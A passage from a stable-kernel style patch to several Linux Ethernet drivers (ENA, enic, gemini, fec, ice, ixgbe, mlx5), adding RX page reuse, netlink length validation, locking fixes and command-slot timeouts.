++			  "RX allocated small packet. len %d.\n", skb->len);
+ 		skb->protocol = eth_type_trans(skb, rx_ring->netdev);
+ 		rx_ring->free_ids[*next_to_clean] = req_id;
+ 		*next_to_clean = ENA_RX_RING_IDX_ADD(*next_to_clean, descs,
+@@ -1501,14 +1511,21 @@ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 		return skb;
+ 	}
+ 
+-	ena_unmap_rx_buff(rx_ring, rx_info);
++	buf_len = SKB_DATA_ALIGN(len + buf_offset + tailroom);
++
++	/* If XDP isn't loaded try to reuse part of the RX buffer */
++	reuse_rx_buf_page = !is_xdp_loaded &&
++			    ena_try_rx_buf_page_reuse(rx_info, buf_len, len, pkt_offset);
++
++	if (!reuse_rx_buf_page)
++		ena_unmap_rx_buff_attrs(rx_ring, rx_info, DMA_ATTR_SKIP_CPU_SYNC);
+ 
+-	skb = ena_alloc_skb(rx_ring, page_addr);
++	skb = ena_alloc_skb(rx_ring, buf_addr, buf_len);
+ 	if (unlikely(!skb))
+ 		return NULL;
+ 
+ 	/* Populate skb's linear part */
+-	skb_reserve(skb, page_offset);
++	skb_reserve(skb, buf_offset);
+ 	skb_put(skb, len);
+ 	skb->protocol = eth_type_trans(skb, rx_ring->netdev);
+ 
+@@ -1517,7 +1534,8 @@ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 			  "RX skb updated. len %d. data_len %d\n",
+ 			  skb->len, skb->data_len);
+ 
+-		rx_info->page = NULL;
++		if (!reuse_rx_buf_page)
++			rx_info->page = NULL;
+ 
+ 		rx_ring->free_ids[*next_to_clean] = req_id;
+ 		*next_to_clean =
+@@ -1532,10 +1550,27 @@ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 
+ 		rx_info = &rx_ring->rx_buffer_info[req_id];
+ 
+-		ena_unmap_rx_buff(rx_ring, rx_info);
++		/* rx_info->buf_offset includes rx_ring->rx_headroom */
++		buf_offset = rx_info->buf_offset;
++		pkt_offset = buf_offset - rx_ring->rx_headroom;
++		buf_len = SKB_DATA_ALIGN(len + buf_offset + tailroom);
++		page_offset = rx_info->page_offset;
++
++		pre_reuse_paddr = dma_unmap_addr(&rx_info->ena_buf, paddr);
++
++		reuse_rx_buf_page = !is_xdp_loaded &&
++				    ena_try_rx_buf_page_reuse(rx_info, buf_len, len, pkt_offset);
++
++		dma_sync_single_for_cpu(rx_ring->dev,
++					pre_reuse_paddr + pkt_offset,
++					len,
++					DMA_FROM_DEVICE);
++
++		if (!reuse_rx_buf_page)
++			ena_unmap_rx_buff_attrs(rx_ring, rx_info, DMA_ATTR_SKIP_CPU_SYNC);
+ 
+ 		skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags, rx_info->page,
+-				rx_info->page_offset, len, ENA_PAGE_SIZE);
++				page_offset + buf_offset, len, buf_len);
+ 
+ 	} while (1);
+ 
+@@ -1641,14 +1676,14 @@ static int ena_xdp_handle_buff(struct ena_ring *rx_ring, struct xdp_buff *xdp, u
+ 
+ 	rx_info = &rx_ring->rx_buffer_info[rx_ring->ena_bufs[0].req_id];
+ 	xdp_prepare_buff(xdp, page_address(rx_info->page),
+-			 rx_info->page_offset,
++			 rx_info->buf_offset,
+ 			 rx_ring->ena_bufs[0].len, false);
+ 
+ 	ret = ena_xdp_execute(rx_ring, xdp);
+ 
+ 	/* The xdp program might expand the headers */
+ 	if (ret == ENA_XDP_PASS) {
+-		rx_info->page_offset = xdp->data - xdp->data_hard_start;
++		rx_info->buf_offset = xdp->data - xdp->data_hard_start;
+ 		rx_ring->ena_bufs[0].len = xdp->data_end - xdp->data;
+ 	}
+ 
+@@ -1677,6 +1712,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 	int xdp_flags = 0;
+ 	int total_len = 0;
+ 	int xdp_verdict;
++	u8 pkt_offset;
+ 	int rc = 0;
+ 	int i;
+ 
+@@ -1703,13 +1739,19 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 
+ 		/* First descriptor might have an offset set by the device */
+ 		rx_info = &rx_ring->rx_buffer_info[rx_ring->ena_bufs[0].req_id];
+-		rx_info->page_offset += ena_rx_ctx.pkt_offset;
++		pkt_offset = ena_rx_ctx.pkt_offset;
++		rx_info->buf_offset += pkt_offset;
+ 
+ 		netif_dbg(rx_ring->adapter, rx_status, rx_ring->netdev,
+ 			  "rx_poll: q %d got packet from ena. descs #: %d l3 proto %d l4 proto %d hash: %x\n",
+ 			  rx_ring->qid, ena_rx_ctx.descs, ena_rx_ctx.l3_proto,
+ 			  ena_rx_ctx.l4_proto, ena_rx_ctx.hash);
+ 
++		dma_sync_single_for_cpu(rx_ring->dev,
++					dma_unmap_addr(&rx_info->ena_buf, paddr) + pkt_offset,
++					rx_ring->ena_bufs[0].len,
++					DMA_FROM_DEVICE);
++
+ 		if (ena_xdp_present_ring(rx_ring))
+ 			xdp_verdict = ena_xdp_handle_buff(rx_ring, &xdp, ena_rx_ctx.descs);
+ 
+@@ -1733,8 +1775,9 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 				 * from RX side.
+ 				 */
+ 				if (xdp_verdict & ENA_XDP_FORWARDED) {
+-					ena_unmap_rx_buff(rx_ring,
+-							  &rx_ring->rx_buffer_info[req_id]);
++					ena_unmap_rx_buff_attrs(rx_ring,
++								&rx_ring->rx_buffer_info[req_id],
++								DMA_ATTR_SKIP_CPU_SYNC);
+ 					rx_ring->rx_buffer_info[req_id].page = NULL;
+ 				}
+ 			}
+@@ -1796,8 +1839,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 	adapter = netdev_priv(rx_ring->netdev);
+ 
+ 	if (rc == -ENOSPC) {
+-		ena_increase_stat(&rx_ring->rx_stats.bad_desc_num, 1,
+-				  &rx_ring->syncp);
++		ena_increase_stat(&rx_ring->rx_stats.bad_desc_num, 1, &rx_ring->syncp);
+ 		ena_reset_device(adapter, ENA_REGS_RESET_TOO_MANY_RX_DESCS);
+ 	} else {
+ 		ena_increase_stat(&rx_ring->rx_stats.bad_req_id, 1,
+@@ -2342,8 +2384,7 @@ static int ena_rss_configure(struct ena_adapter *adapter)
+ 	if (!ena_dev->rss.tbl_log_size) {
+ 		rc = ena_rss_init_default(adapter);
+ 		if (rc && (rc != -EOPNOTSUPP)) {
+-			netif_err(adapter, ifup, adapter->netdev,
+-				  "Failed to init RSS rc: %d\n", rc);
++			netif_err(adapter, ifup, adapter->netdev, "Failed to init RSS rc: %d\n", rc);
+ 			return rc;
+ 		}
+ 	}
+@@ -3216,7 +3257,8 @@ static void ena_config_host_info(struct ena_com_dev *ena_dev, struct pci_dev *pd
+ 		ENA_ADMIN_HOST_INFO_RX_OFFSET_MASK |
+ 		ENA_ADMIN_HOST_INFO_INTERRUPT_MODERATION_MASK |
+ 		ENA_ADMIN_HOST_INFO_RX_BUF_MIRRORING_MASK |
+-		ENA_ADMIN_HOST_INFO_RSS_CONFIGURABLE_FUNCTION_KEY_MASK;
++		ENA_ADMIN_HOST_INFO_RSS_CONFIGURABLE_FUNCTION_KEY_MASK |
++		ENA_ADMIN_HOST_INFO_RX_PAGE_REUSE_MASK;
+ 
+ 	rc = ena_com_set_host_attributes(ena_dev);
+ 	if (rc) {
+@@ -3259,8 +3301,7 @@ static void ena_config_debug_area(struct ena_adapter *adapter)
+ 	rc = ena_com_set_host_attributes(adapter->ena_dev);
+ 	if (rc) {
+ 		if (rc == -EOPNOTSUPP)
+-			netif_warn(adapter, drv, adapter->netdev,
+-				   "Cannot set host attributes\n");
++			netif_warn(adapter, drv, adapter->netdev, "Cannot set host attributes\n");
+ 		else
+ 			netif_err(adapter, drv, adapter->netdev,
+ 				  "Cannot set host attributes\n");
+@@ -4132,8 +4173,8 @@ static int ena_rss_init_default(struct ena_adapter *adapter)
+ 		}
+ 	}
+ 
+-	rc = ena_com_fill_hash_function(ena_dev, ENA_ADMIN_TOEPLITZ, NULL,
+-					ENA_HASH_KEY_SIZE, 0xFFFFFFFF);
++	rc = ena_com_fill_hash_function(ena_dev, ENA_ADMIN_TOEPLITZ, NULL, ENA_HASH_KEY_SIZE,
++					0xFFFFFFFF);
+ 	if (unlikely(rc && (rc != -EOPNOTSUPP))) {
+ 		dev_err(dev, "Cannot fill hash function\n");
+ 		goto err_fill_indir;
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.h b/drivers/net/ethernet/amazon/ena/ena_netdev.h
+index 2cb141079474c..73bfd7229c6aa 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.h
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.h
+@@ -51,6 +51,8 @@
+ #define ENA_DEFAULT_RING_SIZE	(1024)
+ #define ENA_MIN_RING_SIZE	(256)
+ 
++#define ENA_MIN_RX_BUF_SIZE (2048)
++
+ #define ENA_MIN_NUM_IO_QUEUES	(1)
+ 
+ #define ENA_TX_WAKEUP_THRESH		(MAX_SKB_FRAGS + 2)
+@@ -175,7 +177,9 @@ struct ena_tx_buffer {
+ struct ena_rx_buffer {
+ 	struct sk_buff *skb;
+ 	struct page *page;
++	dma_addr_t dma_addr;
+ 	u32 page_offset;
++	u32 buf_offset;
+ 	struct ena_com_buf ena_buf;
+ } ____cacheline_aligned;
+ 
+diff --git a/drivers/net/ethernet/cisco/enic/enic_main.c b/drivers/net/ethernet/cisco/enic/enic_main.c
+index 29500d32e3626..2065c26f394db 100644
+--- a/drivers/net/ethernet/cisco/enic/enic_main.c
++++ b/drivers/net/ethernet/cisco/enic/enic_main.c
+@@ -1117,18 +1117,30 @@ static int enic_set_vf_port(struct net_device *netdev, int vf,
+ 	pp->request = nla_get_u8(port[IFLA_PORT_REQUEST]);
+ 
+ 	if (port[IFLA_PORT_PROFILE]) {
++		if (nla_len(port[IFLA_PORT_PROFILE]) != PORT_PROFILE_MAX) {
++			memcpy(pp, &prev_pp, sizeof(*pp));
++			return -EINVAL;
++		}
+ 		pp->set |= ENIC_SET_NAME;
+ 		memcpy(pp->name, nla_data(port[IFLA_PORT_PROFILE]),
+ 			PORT_PROFILE_MAX);
+ 	}
+ 
+ 	if (port[IFLA_PORT_INSTANCE_UUID]) {
++		if (nla_len(port[IFLA_PORT_INSTANCE_UUID]) != PORT_UUID_MAX) {
++			memcpy(pp, &prev_pp, sizeof(*pp));
++			return -EINVAL;
++		}
+ 		pp->set |= ENIC_SET_INSTANCE;
+ 		memcpy(pp->instance_uuid,
+ 			nla_data(port[IFLA_PORT_INSTANCE_UUID]), PORT_UUID_MAX);
+ 	}
+ 
+ 	if (port[IFLA_PORT_HOST_UUID]) {
++		if (nla_len(port[IFLA_PORT_HOST_UUID]) != PORT_UUID_MAX) {
++			memcpy(pp, &prev_pp, sizeof(*pp));
++			return -EINVAL;
++		}
+ 		pp->set |= ENIC_SET_HOST;
+ 		memcpy(pp->host_uuid,
+ 			nla_data(port[IFLA_PORT_HOST_UUID]), PORT_UUID_MAX);
+diff --git a/drivers/net/ethernet/cortina/gemini.c b/drivers/net/ethernet/cortina/gemini.c
+index 7c0b0bc033c9c..19fb8c4caab87 100644
+--- a/drivers/net/ethernet/cortina/gemini.c
++++ b/drivers/net/ethernet/cortina/gemini.c
+@@ -1108,10 +1108,13 @@ static void gmac_tx_irq_enable(struct net_device *netdev,
+ {
+ 	struct gemini_ethernet_port *port = netdev_priv(netdev);
+ 	struct gemini_ethernet *geth = port->geth;
++	unsigned long flags;
+ 	u32 val, mask;
+ 
+ 	netdev_dbg(netdev, "%s device %d\n", __func__, netdev->dev_id);
+ 
++	spin_lock_irqsave(&geth->irq_lock, flags);
++
+ 	mask = GMAC0_IRQ0_TXQ0_INTS << (6 * netdev->dev_id + txq);
+ 
+ 	if (en)
+@@ -1120,6 +1123,8 @@ static void gmac_tx_irq_enable(struct net_device *netdev,
+ 	val = readl(geth->base + GLOBAL_INTERRUPT_ENABLE_0_REG);
+ 	val = en ? val | mask : val & ~mask;
+ 	writel(val, geth->base + GLOBAL_INTERRUPT_ENABLE_0_REG);
++
++	spin_unlock_irqrestore(&geth->irq_lock, flags);
+ }
+ 
+ static void gmac_tx_irq(struct net_device *netdev, unsigned int txq_num)
+@@ -1426,15 +1431,19 @@ static unsigned int gmac_rx(struct net_device *netdev, unsigned int budget)
+ 	union gmac_rxdesc_3 word3;
+ 	struct page *page = NULL;
+ 	unsigned int page_offs;
++	unsigned long flags;
+ 	unsigned short r, w;
+ 	union dma_rwptr rw;
+ 	dma_addr_t mapping;
+ 	int frag_nr = 0;
+ 
++	spin_lock_irqsave(&geth->irq_lock, flags);
+ 	rw.bits32 = readl(ptr_reg);
+ 	/* Reset interrupt as all packages until here are taken into account */
+ 	writel(DEFAULT_Q0_INT_BIT << netdev->dev_id,
+ 	       geth->base + GLOBAL_INTERRUPT_STATUS_1_REG);
++	spin_unlock_irqrestore(&geth->irq_lock, flags);
++
+ 	r = rw.bits.rptr;
+ 	w = rw.bits.wptr;
+ 
+@@ -1737,10 +1746,9 @@ static irqreturn_t gmac_irq(int irq, void *data)
+ 		gmac_update_hw_stats(netdev);
+ 
+ 	if (val & (GMAC0_RX_OVERRUN_INT_BIT << (netdev->dev_id * 8))) {
++		spin_lock(&geth->irq_lock);
+ 		writel(GMAC0_RXDERR_INT_BIT << (netdev->dev_id * 8),
+ 		       geth->base + GLOBAL_INTERRUPT_STATUS_4_REG);
+-
+-		spin_lock(&geth->irq_lock);
+ 		u64_stats_update_begin(&port->ir_stats_syncp);
+ 		++port->stats.rx_fifo_errors;
+ 		u64_stats_update_end(&port->ir_stats_syncp);
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index ebff14b0837d9..0a3df468316e5 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -3732,6 +3732,14 @@ static int fec_enet_init(struct net_device *ndev)
+ 	return ret;
+ }
+ 
++static void fec_enet_deinit(struct net_device *ndev)
++{
++	struct fec_enet_private *fep = netdev_priv(ndev);
++
++	netif_napi_del(&fep->napi);
++	fec_enet_free_queue(ndev);
++}
++
+ #ifdef CONFIG_OF
+ static int fec_reset_phy(struct platform_device *pdev)
+ {
+@@ -4136,6 +4144,7 @@ fec_probe(struct platform_device *pdev)
+ 	fec_enet_mii_remove(fep);
+ failed_mii_init:
+ failed_irq:
++	fec_enet_deinit(ndev);
+ failed_init:
+ 	fec_ptp_stop(pdev);
+ failed_reset:
+@@ -4199,6 +4208,7 @@ fec_drv_remove(struct platform_device *pdev)
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 
++	fec_enet_deinit(ndev);
+ 	free_netdev(ndev);
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/freescale/fec_ptp.c b/drivers/net/ethernet/freescale/fec_ptp.c
+index cffd9ad499dda..e0393dc159fc7 100644
+--- a/drivers/net/ethernet/freescale/fec_ptp.c
++++ b/drivers/net/ethernet/freescale/fec_ptp.c
+@@ -102,14 +102,13 @@ static int fec_ptp_enable_pps(struct fec_enet_private *fep, uint enable)
+ 	struct timespec64 ts;
+ 	u64 ns;
+ 
+-	if (fep->pps_enable == enable)
+-		return 0;
+-
+-	fep->pps_channel = DEFAULT_PPS_CHANNEL;
+-	fep->reload_period = PPS_OUPUT_RELOAD_PERIOD;
+-
+ 	spin_lock_irqsave(&fep->tmreg_lock, flags);
+ 
++	if (fep->pps_enable == enable) {
++		spin_unlock_irqrestore(&fep->tmreg_lock, flags);
++		return 0;
++	}
++
+ 	if (enable) {
+ 		/* clear capture or output compare interrupt status if have.
+ 		 */
+@@ -440,6 +439,9 @@ static int fec_ptp_enable(struct ptp_clock_info *ptp,
+ 	int ret = 0;
+ 
+ 	if (rq->type == PTP_CLK_REQ_PPS) {
++		fep->pps_channel = DEFAULT_PPS_CHANNEL;
++		fep->reload_period = PPS_OUPUT_RELOAD_PERIOD;
++
+ 		ret = fec_ptp_enable_pps(fep, on);
+ 
+ 		return ret;
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+index 02eb78df2378e..a163e7717a534 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+@@ -3473,7 +3473,6 @@ static int ice_set_channels(struct net_device *dev, struct ethtool_channels *ch)
+ 	struct ice_pf *pf = vsi->back;
+ 	int new_rx = 0, new_tx = 0;
+ 	bool locked = false;
+-	u32 curr_combined;
+ 	int ret = 0;
+ 
+ 	/* do not support changing channels in Safe Mode */
+@@ -3495,22 +3494,8 @@ static int ice_set_channels(struct net_device *dev, struct ethtool_channels *ch)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	curr_combined = ice_get_combined_cnt(vsi);
+-
+-	/* these checks are for cases where user didn't specify a particular
+-	 * value on cmd line but we get non-zero value anyway via
+-	 * get_channels(); look at ethtool.c in ethtool repository (the user
+-	 * space part), particularly, do_schannels() routine
+-	 */
+-	if (ch->rx_count == vsi->num_rxq - curr_combined)
+-		ch->rx_count = 0;
+-	if (ch->tx_count == vsi->num_txq - curr_combined)
+-		ch->tx_count = 0;
+-	if (ch->combined_count == curr_combined)
+-		ch->combined_count = 0;
+-
+-	if (!(ch->combined_count || (ch->rx_count && ch->tx_count))) {
+-		netdev_err(dev, "Please specify at least 1 Rx and 1 Tx channel\n");
++	if (ch->rx_count && ch->tx_count) {
++		netdev_err(dev, "Dedicated RX or TX channels cannot be used simultaneously\n");
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c b/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
+index 239266e9d5f12..80c16e04f6702 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
+@@ -45,14 +45,15 @@ int ice_vsi_add_vlan(struct ice_vsi *vsi, struct ice_vlan *vlan)
+ 		return -EINVAL;
+ 
+ 	err = ice_fltr_add_vlan(vsi, vlan);
+-	if (err && err != -EEXIST) {
++	if (!err)
++		vsi->num_vlan++;
++	else if (err == -EEXIST)
++		err = 0;
++	else
+ 		dev_err(ice_pf_to_dev(vsi->back), "Failure Adding VLAN %d on VSI %i, status %d\n",
+ 			vlan->vid, vsi->vsi_num, err);
+-		return err;
+-	}
+ 
+-	vsi->num_vlan++;
+-	return 0;
++	return err;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h b/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
+index 61b9774b3d31e..c24a72d1e2737 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
+@@ -3673,9 +3673,7 @@ struct ixgbe_info {
+ #define IXGBE_KRM_LINK_S1(P)		((P) ? 0x8200 : 0x4200)
+ #define IXGBE_KRM_LINK_CTRL_1(P)	((P) ? 0x820C : 0x420C)
+ #define IXGBE_KRM_AN_CNTL_1(P)		((P) ? 0x822C : 0x422C)
+-#define IXGBE_KRM_AN_CNTL_4(P)		((P) ? 0x8238 : 0x4238)
+ #define IXGBE_KRM_AN_CNTL_8(P)		((P) ? 0x8248 : 0x4248)
+-#define IXGBE_KRM_PCS_KX_AN(P)		((P) ? 0x9918 : 0x5918)
+ #define IXGBE_KRM_SGMII_CTRL(P)		((P) ? 0x82A0 : 0x42A0)
+ #define IXGBE_KRM_LP_BASE_PAGE_HIGH(P)	((P) ? 0x836C : 0x436C)
+ #define IXGBE_KRM_DSP_TXFFE_STATE_4(P)	((P) ? 0x8634 : 0x4634)
+@@ -3685,7 +3683,6 @@ struct ixgbe_info {
+ #define IXGBE_KRM_PMD_FLX_MASK_ST20(P)	((P) ? 0x9054 : 0x5054)
+ #define IXGBE_KRM_TX_COEFF_CTRL_1(P)	((P) ? 0x9520 : 0x5520)
+ #define IXGBE_KRM_RX_ANA_CTL(P)		((P) ? 0x9A00 : 0x5A00)
+-#define IXGBE_KRM_FLX_TMRS_CTRL_ST31(P)	((P) ? 0x9180 : 0x5180)
+ 
+ #define IXGBE_KRM_PMD_FLX_MASK_ST20_SFI_10G_DA		~(0x3 << 20)
+ #define IXGBE_KRM_PMD_FLX_MASK_ST20_SFI_10G_SR		BIT(20)
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+index cdc912bba8089..f1b63937c552c 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_x550.c
+@@ -1724,59 +1724,9 @@ static s32 ixgbe_setup_sfi_x550a(struct ixgbe_hw *hw, ixgbe_link_speed *speed)
+ 		return -EINVAL;
+ 	}
+ 
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_PMD_FLX_MASK_ST20(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* change mode enforcement rules to hybrid */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_FLX_TMRS_CTRL_ST31(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= 0x0400;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_FLX_TMRS_CTRL_ST31(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* manually control the config */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_LINK_CTRL_1(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= 0x20002240;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_LINK_CTRL_1(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* move the AN base page values */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_PCS_KX_AN(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= 0x1;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_PCS_KX_AN(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* set the AN37 over CB mode */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_AN_CNTL_4(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= 0x20000000;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_AN_CNTL_4(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+-
+-	/* restart AN manually */
+-	(void)mac->ops.read_iosf_sb_reg(hw,
+-			IXGBE_KRM_LINK_CTRL_1(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, &reg_val);
+-	reg_val |= IXGBE_KRM_LINK_CTRL_1_TETH_AN_RESTART;
+-
+-	(void)mac->ops.write_iosf_sb_reg(hw,
+-			IXGBE_KRM_LINK_CTRL_1(hw->bus.lan_id),
+-			IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
++	status = mac->ops.write_iosf_sb_reg(hw,
++				IXGBE_KRM_PMD_FLX_MASK_ST20(hw->bus.lan_id),
++				IXGBE_SB_IOSF_TARGET_KR_PHY, reg_val);
+ 
+ 	/* Toggle port SW reset by AN reset. */
+ 	status = ixgbe_restart_an_internal_phy_x550em(hw);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+index ac6a0785b10d8..465d2adbf3c00 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+@@ -964,19 +964,32 @@ static void cmd_work_handler(struct work_struct *work)
+ 	bool poll_cmd = ent->polling;
+ 	struct mlx5_cmd_layout *lay;
+ 	struct mlx5_core_dev *dev;
+-	unsigned long cb_timeout;
+-	struct semaphore *sem;
++	unsigned long timeout;
+ 	unsigned long flags;
+ 	int alloc_ret;
+ 	int cmd_mode;
+ 
++	complete(&ent->handling);
++
+ 	dev = container_of(cmd, struct mlx5_core_dev, cmd);
+-	cb_timeout = msecs_to_jiffies(mlx5_tout_ms(dev, CMD));
++	timeout = msecs_to_jiffies(mlx5_tout_ms(dev, CMD));
+ 
+-	complete(&ent->handling);
+-	sem = ent->page_queue ? &cmd->vars.pages_sem : &cmd->vars.sem;
+-	down(sem);
+ 	if (!ent->page_queue) {
++		if (down_timeout(&cmd->vars.sem, timeout)) {
++			mlx5_core_warn(dev, "%s(0x%x) timed out while waiting for a slot.\n",
++				       mlx5_command_str(ent->op), ent->op);
++			if (ent->callback) {
++				ent->callback(-EBUSY, ent->context);
++				mlx5_free_cmd_msg(dev, ent->out);
++				free_msg(dev, ent->in);
++				cmd_ent_put(ent);
++			} else {
++				ent->ret = -EBUSY;
++				complete(&ent->done);
++			}
++			complete(&ent->slotted);
++			return;
++		}
+ 		alloc_ret = cmd_alloc_index(cmd, ent);
+ 		if (alloc_ret < 0) {
+ 			mlx5_core_err_rl(dev, "failed to allocate command entry\n");
+@@ -989,10 +1002,11 @@ static void cmd_work_handler(struct work_struct *work)
+ 				ent->ret = -EAGAIN;
+ 				complete(&ent->done);
+ 			}
+-			up(sem);
++			up(&cmd->vars.sem);
+ 			return;
+ 		}
+ 	} else {
++		down(&cmd->vars.pages_sem);
+ 		ent->idx = cmd->vars.max_reg_cmds;
+ 		spin_lock_irqsave(&cmd->alloc_lock, flags);
+ 		clear_bit(ent->idx, &cmd->vars.bitmask);
+@@ -1000,6 +1014,8 @@ static void cmd_work_handler(struct work_struct *work)
+ 		spin_unlock_irqrestore(&cmd->alloc_lock, flags);
+ 	}
+ 
++	complete(&ent->slotted);
++
+ 	lay = get_inst(cmd, ent->idx);
+ 	ent->lay = lay;
+ 	memset(lay, 0, sizeof(*lay));
+@@ -1018,7 +1034,7 @@ static void cmd_work_handler(struct work_struct *work)
+ 	ent->ts1 = ktime_get_ns();
+ 	cmd_mode = cmd->mode;
+ 
+-	if (ent->callback && schedule_delayed_work(&ent->cb_timeout_work, cb_timeout))
++	if (ent->callback && schedule_delayed_work(&ent->cb_timeout_work, timeout))
+ 		cmd_ent_get(ent);
+ 	set_bit(MLX5_CMD_ENT_STATE_PENDING_COMP, &ent->state);
+ 
+@@ -1138,6 +1154,9 @@ static int wait_func(struct mlx5_core_dev *dev, struct mlx5_cmd_work_ent *ent)
+ 		ent->ret = -ECANCELED;
+ 		goto out_err;
+ 	}
++
++	wait_for_completion(&ent->slotted);
++
+ 	if (cmd->mode == CMD_MODE_POLLING || ent->polling)
+ 		wait_for_completion(&ent->done);
+ 	else if (!wait_for_completion_timeout(&ent->done, timeout))
+@@ -1152,6 +1171,9 @@ static int wait_func(struct mlx5_core_dev *dev, struct mlx5_cmd_work_ent *ent)
+ 	} else if (err == -ECANCELED) {
+ 		mlx5_core_warn(dev, "%s(0x%x) canceled on out of queue timeout.\n",
+ 			       mlx5_command_str(ent->op), ent->op);
++	} else if (err == -EBUSY) {
++		mlx5_core_warn(dev, "%s(0x%x) timeout while waiting for command semaphore.\n",
++			       mlx5_command_str(ent->op), ent->op);
+ 	}
+ 	mlx5_core_dbg(dev, "err %d, delivery status %s(%d)\n",
+ 		      err, deliv_status_to_str(ent->status), ent->status);
+@@ -1203,6 +1225,7 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 	ent->polling = force_polling;
+ 
+ 	init_completion(&ent->handling);
++	init_completion(&ent->slotted);
+ 	if (!callback)
+ 		init_completion(&ent->done);
+ 
+@@ -1220,7 +1243,7 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 		return 0; /* mlx5_cmd_comp_handler() will put(ent) */
+ 
+ 	err = wait_func(dev, ent);
+-	if (err == -ETIMEDOUT || err == -ECANCELED)
++	if (err == -ETIMEDOUT || err == -ECANCELED || err == -EBUSY)
+ 		goto out_free;
+ 
+ 	ds = ent->ts2 - ent->ts1;
+@@ -1609,6 +1632,9 @@ static int cmd_comp_notifier(struct notifier_block *nb,
+ 	dev = container_of(cmd, struct mlx5_core_dev, cmd);
+ 	eqe = data;
+ 
++	if (dev->state == MLX5_DEVICE_STATE_INTERNAL_ERROR)
++		return NOTIFY_DONE;
++
+ 	mlx5_cmd_comp_handler(dev, be32_to_cpu(eqe->data.cmd.vector), false);
+ 
+ 	return NOTIFY_OK;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/params.c b/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
+index d3de1b7a80bf5..be7302aa6f864 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
+@@ -581,11 +581,16 @@ int mlx5e_mpwrq_validate_xsk(struct mlx5_core_dev *mdev, struct mlx5e_params *pa
+ 	bool unaligned = xsk ? xsk->unaligned : false;
+ 	u16 max_mtu_pkts;
+ 
